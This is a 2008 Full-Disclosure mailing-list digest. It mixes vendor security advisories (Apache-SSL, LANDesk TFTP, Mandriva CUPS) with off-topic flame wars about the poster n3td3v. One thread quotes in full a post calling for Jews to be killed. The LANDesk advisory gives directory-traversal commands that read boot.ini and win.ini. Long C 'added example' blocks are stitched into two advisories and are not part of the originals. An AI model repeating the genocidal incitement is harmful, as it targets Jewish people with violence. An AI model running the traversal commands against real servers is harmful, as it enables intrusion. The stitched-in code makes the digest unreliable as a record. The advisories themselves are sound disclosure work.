Once upon a time in toy town, I offered to contract the services of a professional hit-man to have n3td3v executed - in part a joke, my black humour. However, I have received so many donations from various gmail.com addresses that I have just been able to purchase my first car with the left-over change. As I type this from my Lamborghini Diablo parked up in a car park at London's Heathrow eagerly awaiting the arrival of "Aghbad", a delightful Eastern European chap with a pretty impressive handlebar mustache which matches the colour of the AK-47 I believe has been paid to come off before the concourse, I can't help but realize just HOW MANY of the SANS people paid their donations to this worthwhile cause. I also wonder if n3td3v thought the CIA would allow him to continue his campaign of hate.

Maybe the FUD will stop and we can all get on with whatever we were doing before the n3td3v agenda.

--- n3td3v wrote:

> On Mon, Mar 31, 2008 at 4:00 AM, wrote:
> > On Sat, 29 Mar 2008 17:08:43 -0000, n3td3v said:
> > > Why are they announcing podcasts when both Joel Esler and Johannes
> > > Ullrich have a privacy breach still to publicly acknowledge and
> > > apologize for?
From mikie.simpson at gmail.com Wed Apr 2 14:14:36 2008
From: mikie.simpson at gmail.com (Michael Simpson)
Date: Wed, 2 Apr 2008 14:14:36 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To:
References:
Message-ID: <82abd3a70804020614r504fd633mbf75a8cdde17564d@mail.gmail.com>

On 4/2/08, Cassidy MacFarlane wrote:
> "You're playing with fire. Fire that cannot be put out with words but
> only inflame the situation of which you are misinformed."
> - n3td3v
>

lolz

and the classic:

Hello Mi5, Mi6, Symantec

I have information regarding Yahoo

Reference: http://groups.google.com/group/n3td3v/browse_wank/thread/7b60d3fbd0eb9a77/7d1f85fbe122fb29#7d1f85fbe122fb29

I used to be his friend but now he fell out with me, so I want to tell everyone about him, because he's a Yahoo employee I used to give "intelligence" to, but now he backstabbed me, and he miscalculated how much I knew about him and his "circle of friends".

He works for Yahoo

Contact me on e-mail and we can exchange phone numbers mibbe go out for a meal, circle-jerk &c

Regards,

n3td3v

From bambenek.infosec at gmail.com Wed Apr 2 16:34:30 2008
From: bambenek.infosec at gmail.com (John C. A. Bambenek, GCIH, CISSP)
Date: Wed, 2 Apr 2008 10:34:30 -0500
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <639063.889.qm@web23315.mail.ird.yahoo.com>
References: <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com> <639063.889.qm@web23315.mail.ird.yahoo.com>
Message-ID:

http://www.allfordmustangs.com/photopost/data/3243/Lambo-Doors-So-Played-Out.jpg

That's all I got.

On Wed, Apr 2, 2008 at 5:02 AM, Micheal Turner wrote:
> Once upon a time in toy town, I offered to contract
> the services of a professional hit-man to have n3td3v
> executed - in part a joke, my black humour. However, I
> have received so many donations from various gmail.com
> addresses that I have just been able to purchase my
> first car with the left-over change.
> A Smarter Inbox http://uk.docs.yahoo.com/nowyoucan.html
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/61e28c72/attachment.html

From Glenn.Everhart at chase.com Wed Apr 2 15:22:06 2008
From: Glenn.Everhart at chase.com (Glenn.Everhart at chase.com)
Date: Wed, 2 Apr 2008 10:22:06 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
Message-ID:

The atrocities in Canaan reported about places like Jericho and Ai happened something like 3 millennia ago now; time to get over them, and remember there may be statements in the Bible which are not divinely inspired. In fact the Bible says there are. See for example Jeremiah 8:8 which I have seen translated as roughly: "How can you say 'we are wise, for we have Yahweh's Torah' when it was written for a lie, by the lying pens of scribes"

The tales of Ai and Jericho and so on that come down to us do let us know the Bible narration has survived pretty well intact, not been cleaned up or prettied up as happens with so many narrations with unpleasant acts done by the protagonists.

The later prophets gave a much more worthy picture of how God wants us to act, as did Christ.

Yes, there are people who claim their religion advocates killing all other groups, dispossessing them, stealing from them, etc. etc. but people like that tend to have lives that are (as Hobbes put it) nasty, brutish, and short. Remembering ancient feuds and wrongs particularly after so long a time is a good way to claim such a fate also. Thus folks should have a care about feeding old feuds too.
-----Original Message----- From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of Andrew A Sent: Tuesday, April 01, 2008 7:22 PM To: Full Disclosure Subject: [Full-disclosure] Greedy Jews fact of the day "And it shall be, when the LORD thy God shall bring thee into the land which He swore unto thy fathers, to Abraham, to Isaac, and to Jacob, to give thee--great and goodly cities, which thou didst not build, and houses full of all good things, which thou didst not fill, and cisterns hewn out, which thou didst not hew, vineyards and olive-trees, which thou didst not plant, and thou shalt eat and be satisfied." These verses from Deuteronomy chapter 6 are written on a piece of parchment and placed in a box which is hung outside the house of every Jew that keeps the covenant. And so they have accomplished, in the United States of America. The subprime crises and resulting bailouts (at our expense by our national reserve bank, which is headed by an Orthodox Jew serving a board of Orthodox Jews) are going to create thousands of empty homes and plots of arable land owned by investment banking institutions that are owned exclusively by Orthodox Jews. Why should we leave a single follower of such a filthy, greedy religion alive? Do any of you have an idea? I pray to you, the Lord my God, to help me destroy the Jewish meme. Every single follower of this arrogant and horrible idea should have their gold exchanged for flying pieces of lead and steel. Let the Jews take what they have reaped and sown-- death, destruction and hatred. ----------------------------------------- This transmission may contain information that is privileged, confidential, legally privileged, and/or exempt from disclosure under applicable law. 
If you are not the intended recipient, you are hereby notified that any disclosure, copying, distribution, or use of the information contained herein (including any reliance thereon) is STRICTLY PROHIBITED. Although this transmission and any attachments are believed to be free of any virus or other defect that might affect any computer system into which it is received and opened, it is the responsibility of the recipient to ensure that it is virus free and no responsibility is accepted by JPMorgan Chase & Co., its subsidiaries and affiliates, as applicable, for any loss or damage arising in any way from its use. If you received this transmission in error, please immediately contact the sender and destroy the material in its entirety, whether in electronic or hard copy format. Thank you. -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080402/dc1d9898/attachment.html From adam at algroup.co.uk Wed Apr 2 17:19:47 2008 From: adam at algroup.co.uk (Adam Laurie) Date: Wed, 02 Apr 2008 17:19:47 +0100 Subject: [Full-disclosure] ANNOUNCE: Apache-SSL security release - apache_1.3.41+ssl_1.59 Message-ID: <47F3B223.1000404@algroup.co.uk> Folks, Following information/research provided by Alexander Klink, a new release is out, fixing a low priority security issue as detailed below. The release is on the primary Apache-SSL ftp server and should hit the mirrors over the next few hours, according to their schedules. See http://www.apache-ssl.org for mirrors. 
Advisory follows:

============================================
||| Security Advisory AKLINK-SA-2008-005 |||
||| CVE-2008-0555 (CVE candidate)        |||
============================================

Apache-SSL memory disclosure
============================

Date released: 02.04.2008
Date reported: 17.01.2008
$Revision: 1.1 $

by Alexander Klink
Cynops GmbH
a.klink at cynops.de
https://www.cynops.de/advisories/CVE-2008-0555.txt
(S/MIME signed: https://www.cynops.de/advisories/CVE-2008-0555-signed.txt)
https://www.klink.name/security/aklink-sa-2008-005-apache-ssl.txt
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0555

Vendor: Adam & Ben Laurie
Product: Apache-SSL
Website: http://www.apache-ssl.org
Vulnerability: memory disclosure, potential privilege escalation in web applications
Class: remote
Status: patched
Severity: low
Releases known to be affected: apache_1.3.34+ssl_1.57
Releases known NOT to be affected: apache_1.3.41+ssl_1.59

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Background:

Apache-SSL is a secure web server, based on Apache and SSLeay/OpenSSL.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Overview:

Apache-SSL provides environment variables that are filled with (client) certificate data. If the subject of a client certificate contains special characters, parts of these variables can be overwritten or be filled with other parts of memory.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Technical details:

The certificate DN as returned by the OpenSSL X509_NAME_oneline is passed into the following function:

static void ExpandCert(pool *p,table *pEnv,char *szPrefix,
                       char *szDN, char *szCert)
    {
    char buf[HUGE_STRING_LEN];
    char *s,*t;

    /* Expand a X509_oneline entry into its base components and register
       them as environment variables. Needed if you want to pass certificate
       information to CGI's. The naming convention SHOULD be fairly
       compatible with CGI's written for stronghold's certificate info - Q */

    /* FIXME - strtok() and strcspn() may cause problems on some systems - Q */

    ap_table_setn(pEnv,szDN,ap_pstrdup(p,szCert));
    ap_cpystrn(buf,szCert,sizeof buf);
    for(s=strtok(buf,"/") ; s != NULL ; s=strtok(NULL,"/"))
        {
        int n=strcspn(s,"=");

        s[n]='\0';
        StrUpper(s);
        t=ap_pstrcat(p,szPrefix,s,NULL);
        ap_table_setn(pEnv,t,ap_pstrdup(p,s+n+1));
        }
    }

The function assumes that the relative distinguished name does not contain a '/'. If a '/' is contained in, for example, the common name, strcspn(s,"=") returns the size of s, so s+n+1 points beyond the current token. Furthermore, environment variables can be overwritten by including '/' and '='. For example, to overwrite the OPENSSL_S_CLIENT_DN_OU variable, one could use a certificate with a CN of "/OU=Fake OU". If an application relies on this information to distinguish certificates into different authorization classes, it can be fooled this way.
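The two failure modes of ExpandCert(), as an added example that is not Apache-SSL's code and not part of the advisory: it re-implements the strtok()/strcspn() loop over a small fixed-size table in place of Apache's pool and table API, so the variable overwrite and the over-read can be observed in isolation. The variable prefix SSL_CLIENT_S_DN_, the buffer pre-filled with 'X' to stand in for stale stack contents, the full DN built around the advisory's "/OU=Fake OU" common name, and the hardened variant are all assumptions of this example, not the patch that shipped in apache_1.3.41+ssl_1.59.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Apache-SSL's code: a fixed-size stand-in for Apache's
 * pool/table API so the ExpandCert() loop can be exercised on its own. */
#define MAX_VARS  16
#define NAME_LEN  64
#define VALUE_LEN 256

struct var { char name[NAME_LEN]; char value[VALUE_LEN]; };
struct env { struct var v[MAX_VARS]; int n; };

static int env_find(const struct env *e, const char *name)
{
    for (int i = 0; i < e->n; i++)
        if (strcmp(e->v[i].name, name) == 0)
            return i;
    return -1;
}

/* Set or silently overwrite, like ap_table_setn(); -1 when the table is full. */
static int env_set(struct env *e, const char *name, const char *value)
{
    int i = env_find(e, name);
    if (i < 0) {
        if (e->n == MAX_VARS)
            return -1;
        i = e->n++;
    }
    snprintf(e->v[i].name, NAME_LEN, "%s", name);
    snprintf(e->v[i].value, VALUE_LEN, "%s", value);
    return 0;
}

const char *env_get(const struct env *e, const char *name)
{
    int i = env_find(e, name);
    return i < 0 ? NULL : e->v[i].value;
}

static void str_upper(char *s)
{
    for (; *s; s++)
        *s = (char)toupper((unsigned char)*s);
}

/* Same logic as the vulnerable ExpandCert(): split the one-line DN on '/',
 * cut each token at its first '='.  The buffer is pre-filled with 'X' to
 * stand in for stale stack data (an assumption of this example) so that the
 * over-read on a token without '=' gives a deterministic value. */
void expand_cert_vulnerable(struct env *e, const char *prefix, const char *dn)
{
    char buf[512], name[NAME_LEN];

    if (strlen(dn) >= sizeof buf - 1)
        return;
    memset(buf, 'X', sizeof buf);
    buf[sizeof buf - 1] = '\0';
    memcpy(buf, dn, strlen(dn) + 1);
    for (char *s = strtok(buf, "/"); s != NULL; s = strtok(NULL, "/")) {
        size_t n = strcspn(s, "=");      /* == strlen(s) when there is no '=' */
        s[n] = '\0';
        str_upper(s);
        snprintf(name, sizeof name, "%s%s", prefix, s);
        env_set(e, name, s + n + 1);     /* points past the token if n == strlen(s) */
    }
}

/* Hardened variant: each token must be NAME=VALUE with a non-empty name, no
 * name may repeat, and the result is committed only if every token passes.
 * This stops the over-read and the overwrite of an attribute the subject
 * really has, but the one-line format itself stays ambiguous: the robust fix
 * is to walk the X509_NAME entries rather than parse this string at all. */
int expand_cert_hardened(struct env *e, const char *prefix, const char *dn)
{
    char buf[512], name[NAME_LEN];
    struct env tmp = *e;

    if (strlen(dn) >= sizeof buf)
        return -1;
    strcpy(buf, dn);
    for (char *s = strtok(buf, "/"); s != NULL; s = strtok(NULL, "/")) {
        char *eq = strchr(s, '=');
        if (eq == NULL || eq == s)       /* no '=' at all, or an empty name */
            return -1;
        *eq = '\0';
        str_upper(s);
        snprintf(name, sizeof name, "%s%s", prefix, s);
        if (env_find(&tmp, name) >= 0)   /* duplicate: a '/' smuggled into a value */
            return -1;
        if (env_set(&tmp, name, eq + 1) < 0)
            return -1;
    }
    *e = tmp;
    return 0;
}
```

Fed the constructed DN "/C=DE/OU=Real OU/CN=/OU=Fake OU", expand_cert_vulnerable() leaves SSL_CLIENT_S_DN_OU set to "Fake OU" and SSL_CLIENT_S_DN_CN empty, exactly the authorization confusion the advisory describes. A DN whose last token has no '=', such as "/C=DE/CN=a/b", yields a variable SSL_CLIENT_S_DN_B whose value is the 'X' filler, i.e. whatever happened to follow the DN in the stack buffer. expand_cert_hardened() returns -1 for both inputs and leaves the table untouched.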
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Communication:

* 17.01.2008: Reported the bug to Ben Laurie
* 17.01.2008: Ben replies and acknowledges the bug
* 01.02.2008: Checking back with Ben on the status
* 01.02.2008: Ben replies that he'll be looking into a patch over the weekend
* 06.02.2008: Ben sends patch and asks for help with testing it
* 07.02.2008: Reply with test results (still a small problem unrelated to the original issue)
* 09.02.2008: Ben sends updated patch
* 11.02.2008: Told Ben that patch works fine
* 18.02.2008: Requested update
* 18.02.2008: Ben replies that he'll deal with it in the next week or so
* 27.02.2008: Requested update
* 27.02.2008: Patch for Apache 1.3.41 is ready, but release is normally managed by Adam Laurie, who is on holiday till March, 11th
* 28.02.2008: Agreed to wait for Adam to return
* 12.03.2008: Ben informs Adam of the new release
* 25.03.2008: Requested update
* 25.03.2008: Ben replies, they are waiting for an updated advisory from me
* 25.03.2008: Sent out updated advisory
* 27.03.2008: Adam says sorry for the delays and that he will try to work on this while he is at "a conference in Amsterdam"
* 01.04.2008: Coordination with Adam and Ben on a release

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Solution:

Upgrade to apache_1.3.41+ssl_1.59.

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Credits:

- Alexander Klink, Cynops GmbH (discovery)

cheers,
Adam

--
Adam Laurie
Tel: +44 (0) 1304 814800
The Bunker Secure Hosting Ltd.
Fax: +44 (0) 1304 814899
Ash Radar Station
Marshborough Road
Sandwich
mailto:adam at algroup.co.uk
Kent CT13 0PL
UNITED KINGDOM
PGP key on keyservers

From razishaban at gmail.com Wed Apr 2 18:20:44 2008
From: razishaban at gmail.com (Razi Shaban)
Date: Wed, 2 Apr 2008 20:20:44 +0300
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To:
References:
Message-ID: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>

Quick question:
What does any of this have to do with "Full Disclosure"?
Are any of you disclosing anything?

--
Razi

On 4/2/08, Glenn.Everhart at chase.com wrote:
>
> The atrocities in Canaan reported about places like Jericho and Ai happened
> something like 3 millennia ago now; time to
> get over them, and remember there may be statements in the Bible which are
> not divinely inspired. In fact the Bible says
> there are. See for example Jeremiah 8:8 which I have seen translated as
> roughly:
> "How can you say 'we are wise, for we have Yahweh's Torah' when it was
> written for a lie, by the lying pens of scribes"
>
> The tales of Ai and Jericho and so on that come down to us do let us know
> the Bible narration has survived pretty well
> intact, not been cleaned up or prettied up as happens with so many
> narrations with unpleasant acts done by the protagonists.
>
> The later prophets gave a much more worthy picture of how God wants us to
> act, as did Christ.
>
> Yes, there are people who claim their religion advocates killing all other
> groups, dispossessing them, stealing from them,
> etc. etc. but people like that tend to have lives that are (as Hobbes put
> it) nasty, brutish, and short. Remembering ancient
> feuds and wrongs particularly after so long a time is a good way to claim
> such a fate also. Thus folks should have a care
> about feeding old feuds too.
> If you are not the intended recipient, you are hereby notified that any
> disclosure, copying, distribution, or use of the information contained
> herein (including any reliance thereon) is STRICTLY PROHIBITED. Although
> this transmission and any attachments are believed to be free of any virus
> or other defect that might affect any computer system into which it is
> received and opened, it is the responsibility of the recipient to ensure
> that it is virus free and no responsibility is accepted by JPMorgan Chase &
> Co., its subsidiaries and affiliates, as applicable, for any loss or damage
> arising in any way from its use. If you received this transmission in error,
> please immediately contact the sender and destroy the material in its
> entirety, whether in electronic or hard copy format. Thank you.
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From aluigi at autistici.org Wed Apr 2 19:42:47 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Wed, 2 Apr 2008 20:42:47 +0200
Subject: [Full-disclosure] Directory traversal in LANDesk Management Suite 8.80.1.1
Message-ID: <20080402204247.42f3819c.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  LANDesk Management Suite
              http://www.landesk.com/products/ldms/index.aspx
Versions:     <= 8.80.1.1
Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         01 Apr 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

LANDesk is a well known system management software.
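The request filter that the bug in section 2 of this advisory gets past, as an added example that is neither LANDesk's code nor the tftpx tool: a check that only rejects a name starting with ".." (an assumption about how the 8.80.1.1 fix behaves, drawn from the description that one extra leading component defeats it) beside a component-wise check that walks the requested name, treats '/' and '\' alike, and refuses any request whose depth ever drops below the served root. The function names and the /tftproot path are this example's own.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not LANDesk's code: two ways a PXE/TFTP server might
 * decide whether a requested file name may be served.  Each check returns
 * 1 (allow) or 0 (reject). */

/* Assumed weak filter: rejects names that *start* with "..", nothing else.
 * This is the kind of check that "x\..\..\boot.ini" slips past. */
int naive_allows(const char *req)
{
    return strncmp(req, "..", 2) != 0;
}

/* Component-wise check.  '/' and '\\' are both separators (Windows accepts
 * either), "." is ignored, ".." pops one level and anything else pushes one.
 * A ':' anywhere (drive letter, NTFS stream) is rejected outright, as is a
 * request whose depth goes negative at any point, wherever the ".." sits. */
int stays_in_root(const char *req)
{
    int depth = 0;
    const char *p = req;

    if (strchr(req, ':') != NULL)
        return 0;
    while (*p != '\0') {
        while (*p == '/' || *p == '\\')           /* skip separator runs */
            p++;
        if (*p == '\0')
            break;
        const char *start = p;
        while (*p != '\0' && *p != '/' && *p != '\\')
            p++;
        size_t len = (size_t)(p - start);
        if (len == 1 && start[0] == '.')
            continue;
        if (len == 2 && start[0] == '.' && start[1] == '.') {
            if (--depth < 0)                       /* climbed above the root */
                return 0;
            continue;
        }
        depth++;
    }
    return 1;
}

/* Path the server would open for an accepted request: root + '/' + request,
 * with backslashes normalised to '/'.  Returns 0 and an empty string when
 * the request is rejected or does not fit. */
int serve_path(const char *root, const char *req, char *out, size_t outsz)
{
    if (!stays_in_root(req) ||
        snprintf(out, outsz, "%s/%s", root, req) >= (int)outsz) {
        out[0] = '\0';
        return 0;
    }
    for (size_t i = 0; out[i] != '\0'; i++)
        if (out[i] == '\\')
            out[i] = '/';
    return 1;
}
```

With the two request strings from section 3, naive_allows() accepts both because neither begins with "..", while stays_in_root() rejects both: the leading "x" or "what_you_want" component only raises the depth to 1 before the run of ".." drives it below zero.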
#######################################################################

======
2) Bug
======

The PXE TFTP Service is vulnerable to a classical directory traversal vulnerability, exploitable by adding one or more characters before the usual dotdot pattern.

The interesting thing is that version 8.80.1.1 has been released just to fix another directory traversal vulnerability.

#######################################################################

===========
3) The Code
===========

http://aluigi.org/testz/tftpx.zip

  tftpx SERVER x\..\..\..\..\..\..\..\boot.ini none
  tftpx SERVER what_you_want/../../../../../../../windows/win.ini none

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From tbiehn at gmail.com Wed Apr 2 20:52:55 2008
From: tbiehn at gmail.com (T Biehn)
Date: Wed, 2 Apr 2008 15:52:55 -0400
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>
References: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com>
Message-ID: <2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>

That you're a douche maybe.

On Wed, Apr 2, 2008 at 1:20 PM, Razi Shaban wrote:
> Quick question:
> What does any of this have to do with "Full Disclosure"?
> Are any of you disclosing anything?
>
> --
> Razi
>
> On 4/2/08, Glenn.Everhart at chase.com wrote:
> >
> > The atrocities in Canaan reported about places like Jericho and Ai happened
> > something like 3 millennia ago now; time to
> > get over them, and remember there may be statements in the Bible which are
> > not divinely inspired. In fact the Bible says
> > there are.
> > Charter:
> > http://lists.grok.org.uk/full-disclosure-charter.html
> > Hosted and sponsored by Secunia - http://secunia.com/
> >
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

From mastahflank at gmail.com Wed Apr 2 21:02:03 2008
From: mastahflank at gmail.com (josh)
Date: Wed, 2 Apr 2008 20:02:03 +0000
Subject: [Full-disclosure] Greedy Jews fact of the day
In-Reply-To: <2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>
References: <2d792fb20804021020s6295e849i704f8d4d0ac2abb1@mail.gmail.com> <2d6724810804021252g36b10ff3x7d1698b4c56b7804@mail.gmail.com>
Message-ID: <70801963-1207166525-cardhu_decombobulator_blackberry.rim.net-2143400864-@bxe032.bisx.prod.on.blackberry>

Or that this is off-topic, maybe?

Sent from my BlackBerry® smartphone with SprintSpeed

-----Original Message-----
From: "T Biehn"
Date: Wed, 2 Apr 2008 15:52:55
To: "Razi Shaban"
Cc: full-disclosure at lists.grok.org.uk, "Glenn.Everhart at chase.com"
Subject: Re: [Full-disclosure] Greedy Jews fact of the day

That you're a douche maybe.

On Wed, Apr 2, 2008 at 1:20 PM, Razi Shaban wrote:
> Quick question:
> What does any of this have to do with "Full Disclosure"?
> Are any of you disclosing anything?
>
> --
> Razi
>
> On 4/2/08, Glenn.Everhart at chase.com wrote:
> >
> > The atrocities in Canaan reported about places like Jericho and Ai happened
> > something like 3 millennia ago now; time to
> > get over them, and remember there may be statements in the Bible which are
> > not divinely inspired. In fact the Bible says
> > there are.
> > The subprime crises and resulting bailouts (at our expense by our national
> > reserve bank, which is headed by an Orthodox Jew serving a board of Orthodox
> > Jews) are going to create thousands of empty homes and plots of arable land
> > owned by investment banking institutions that are owned exclusively by
> > Orthodox Jews.
> >
> > Why should we leave a single follower of such a filthy, greedy religion
> > alive? Do any of you have an idea?
> >
> > I pray to you, the Lord my God, to help me destroy the Jewish meme. Every
> > single follower of this arrogant and horrible idea should have their gold
> > exchanged for flying pieces of lead and steel. Let the Jews take what they
> > have reaped and sown-- death, destruction and hatred.
> >
> > ________________________________
> >
> > This transmission may contain information that is privileged, confidential,
> > legally privileged, and/or exempt from disclosure under applicable law. If
> > you are not the intended recipient, you are hereby notified that any
> > disclosure, copying, distribution, or use of the information contained
> > herein (including any reliance thereon) is STRICTLY PROHIBITED. Although
> > this transmission and any attachments are believed to be free of any virus
> > or other defect that might affect any computer system into which it is
> > received and opened, it is the responsibility of the recipient to ensure
> > that it is virus free and no responsibility is accepted by JPMorgan Chase &
> > Co., its subsidiaries and affiliates, as applicable, for any loss or damage
> > arising in any way from its use. If you received this transmission in error,
> > please immediately contact the sender and destroy the material in its
> > entirety, whether in electronic or hard copy format. Thank you.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

From xploitable at gmail.com Wed Apr 2 21:26:03 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 21:26:03 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <47F370E6.50301@gmail.com>
References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com> <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu> <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com> <47F370E6.50301@gmail.com>
Message-ID: <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>

On Wed, Apr 2, 2008 at 12:41 PM, Jeff Stebelton wrote:
> you don't need to fill up people's inboxes with rants and rambling calls
> for action from the White House (that one split my side laughing). "In the
> President's Early Bird briefings today is yet another serious cyberwarfare
> warning from that accomplished and respected security researcher, n3td3v.
> Mark this Top Priority and make sure he sees it first thing!".

No, it was sending signals to important people to take action to get it
further pushed up the ladder. In no way do I expect my e-mail to be directly
looked at by the White House. Through signal intelligence, the folks at GCHQ
and NSA would see it and it would influence others who lurk on this list to
take action. And for your information, that's what's happened.
For instance,
http://blog.securitynow.us/2008/03/19/storm-worm-russian-business-network-rbn/

"I have sent a plea for assistance to some of my contacts within the US
government and hope others do as well to get this issue resolved."

So unless you've got other ideas on how to stop Storm Worm, stop trolling in
my threads with off-topicness. n3td3v is big in the security community and
is working with others to get things done for the better of everyone.

Regards,

n3td3v

From security at mandriva.com Wed Apr 2 21:42:00 2008
From: security at mandriva.com (security at mandriva.com)
Date: Wed, 02 Apr 2008 14:42:00 -0600
Subject: [Full-disclosure] [ MDVSA-2008:081 ] - Updated CUPS packages fix multiple vulnerabilities
Message-ID:

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:081
http://www.mandriva.com/security/
_______________________________________________________________________

Package : cups
Date    : April 2, 2008
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

A heap-based buffer overflow in CUPS 1.2.x and later was discovered by
regenrecht of VeriSign iDefense that could allow a remote attacker to
execute arbitrary code via a crafted CGI search expression (CVE-2008-0047).

A validation error in the HP-GL/2 filter was also discovered (CVE-2008-0053).

Finally, a vulnerability in how CUPS handled GIF files was found by Tomas
Hoger of Red Hat, similar to previous issues corrected in PHP, gd, tk,
netpbm, and SDL_image (CVE-2008-1373).

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0047
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0053
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1373
_______________________________________________________________________

Updated Packages:
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

 gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team

From pauls at utdallas.edu Wed Apr 2 22:08:56 2008
From: pauls at utdallas.edu (Paul Schmehl)
Date: Wed, 02 Apr 2008 16:08:56 -0500
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To: <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com>
 <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu> <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com> <47F370E6.50301@gmail.com> <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
Message-ID:

--On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v wrote:
>
> No, it was sending signals to important people to take action to get
> it further pushed up the ladder. In no way do I expect my e-mail to be
> directly looked at by the White House. Through signal intelligence,
> the folks at GCHQ and NSA would see it and it would influence others
> who lurk on this list to take action. And for your information, that's
> what's happened.
>

At first I thought, "How silly", but then I got to thinking about it.....

I'll bet the NSA *does* monitor your communications. After all, spying is
serious business. Those guys probably need an occasional laugh to break the
tension. Monitoring your communications almost guarantees them a laugh every
day.
--
Paul Schmehl (pauls at utdallas.edu)
Senior Information Security Analyst
The University of Texas at Dallas
http://www.utdallas.edu/ir/security/

From xploitable at gmail.com Wed Apr 2 22:17:43 2008
From: xploitable at gmail.com (n3td3v)
Date: Wed, 2 Apr 2008 22:17:43 +0100
Subject: [Full-disclosure] sans handler gives out n3td3v e-mail to public
In-Reply-To:
References: <200803211614.11815.atlas@r4780y.com> <4b6ee9310803221427s289092b1x5066e5f7ff61e17e@mail.gmail.com> <4b6ee9310803291008s459baecexd33b982871045cf8@mail.gmail.com> <20605.1206932416@turing-police.cc.vt.edu> <4b6ee9310804011359g6e827222o2cce826c2e18cda0@mail.gmail.com> <47F370E6.50301@gmail.com> <4b6ee9310804021326u61aabdafy48f785b8a029771b@mail.gmail.com>
Message-ID: <4b6ee9310804021417t74f194e2xbb4f1923b20c830f@mail.gmail.com>

On Wed, Apr 2, 2008 at 10:08 PM, Paul Schmehl wrote:
> --On Wednesday, April 02, 2008 21:26:03 +0100 n3td3v wrote:
> >
> > No, it was sending signals to important people to take action to get
> > it further pushed up the ladder. In no way do I expect my e-mail to be
> > directly looked at by the White House. Through signal intelligence,
> > the folks at GCHQ and NSA would see it and it would influence others
> > who lurk on this list to take action. And for your information, that's
> > what's happened.
> >
>
> At first I thought, "How silly", but then I got to thinking about it.....
>
> I'll bet the NSA *does* monitor your communications. After all, spying is
> serious business. Those guys probably need an occasional laugh to break the
> tension. Monitoring your communications almost guarantees them a laugh every
> day.

